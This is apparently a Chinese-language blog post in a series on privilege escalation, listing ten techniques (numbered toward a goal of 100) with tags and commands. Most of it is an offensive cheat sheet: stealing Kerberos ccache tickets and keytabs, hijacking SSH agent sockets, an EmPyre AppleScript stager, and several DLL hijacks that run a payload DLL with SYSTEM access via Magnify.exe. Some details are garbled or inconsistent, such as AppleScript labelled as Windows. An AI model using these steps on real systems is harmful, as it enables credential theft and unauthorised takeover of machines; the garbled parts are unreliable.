特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。
截至目前,我们一共分享了76种提权方法,本期我们继续整理了10种热门提权方式,本期分享完后,我们一共就分享了86热门提权的方法,而离100种方法也完成快3/4了,请大家继续查收哟,:
1.CCACHE ticket reuse from /tmp
域: Yes
Local Admin: Yes
操作系统: Linux
类型: Enumeration & Hunting
方法:
ls /tmp/ | grep krb5cc_X
export KRB5CCNAME=/tmp/krb5cc_X
2.CCACHE ticket reuse from keyring
域: Yes
Local Admin: Yes
操作系统: Linux
类型: Enumeration & Hunting
方法:
https://github.com/TarlogicSecurity/tickey
/tmp/tickey -i
3.CCACHE ticket reuse from SSSD KCM
域: Yes
Local Admin: Yes
操作系统: Linux
类型: Enumeration & Hunting
方法:
git clone https://github.com/fireeye/SSSDKCMExtractor
python3 SSSDKCMExtractor.py –database secrets.ldb –key secrets.mkey
4.CCACHE ticket reuse from keytab
域: Yes
Local Admin: Yes
操作系统:Linux/Windows/Mac
类型:Enumeration & Hunting
方法:
git clone https://github.com/its-a-feature/KeytabParser
python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
Or
klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
python3 keytabextract.py krb5.keytab
./bifrost -action dump -source keytab -path test
5.SSH Forwarder
域:Yes
Local Admin: Yes
操作系统:Linux
类型:Enumeration & Hunting
方法:
转发代理 yesForwardAgent yes
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
6.AppleScript
域:No
Local Admin: Yes
操作系统:Windows
类型:Enumeration & Hunt
方法:
(EmPyre) > listeners
(EmPyre: listeners) > set Name mylistener
(EmPyre: listeners) > execute
(EmPyre: listeners) > usestager applescript mylistener
(EmPyre: stager/applescript) > execute
批注:这个工具我找了半天,发现这是个七八年前的一个工具
链接地址https://github.com/EmpireProject/EmPyre
7.DLL Search Order Hijacking
域:No
Local Admin: Yes
操作系统:Windows
类型:Hijack
方法:
https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie
运行Brownie
8.Slui File Handler Hijack LPE
域:No
Local Admin: Yes
操作系统:Windows
类型:Hijack
方法:
https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation
Slui.exe
9.CDPSvc DLL Hijacking
域:No
Local Admin: Yes
操作系统:Windows
类型:Hijack
方法:
Cdpsgshims.exe
10.Magnify.exe Dll Search Order Hijacking
域:No
Local Admin: Yes
操作系统:Windows
类型:Hijack
方法:
将有效负载 dll 作为 igdgmm64.dll 复制到可写的系统路径 %PATH%,例如 C:\python27
按Win键+L
按回车键
在显示密码框的登录屏幕上按 WinKey++(plusKey).
然后payload dll将以系统访问权限执行.